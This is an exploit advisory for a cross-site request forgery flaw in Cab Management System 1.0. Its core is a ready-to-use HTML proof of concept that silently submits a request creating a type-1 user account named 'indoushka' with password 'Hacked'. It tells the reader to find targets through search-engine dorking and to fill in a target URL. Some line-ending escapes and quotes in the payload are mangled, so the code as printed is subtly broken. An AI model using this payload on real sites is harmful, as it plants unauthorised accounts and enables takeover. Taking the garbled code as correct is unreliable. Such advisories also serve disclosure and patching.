Authored by indoushka

Cab Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================
| # Title : cab management system 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Line 6 : Set your target url

[+] Line 15+19 : Set your user & pass

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>
<html>
<body>
<script> function submitRequest()
{ var xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/cms/classes/Users.php?f=save", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------");
xhr.withCredentials = true;
var body =
"-----------------------------rn" +
"Content-Disposition: form-data; name="username"rn" +
"rn" +
"indoushkarn" +
"-----------------------------rn" +
"Content-Disposition: form-data; name="password"rn" +
"rn" +
"Hackedrn" +
"-----------------------------rn" +
"Content-Disposition: form-data; name="type"rn" +
"rn" +
"1rn" +
"-------------------------------rn";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>


Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================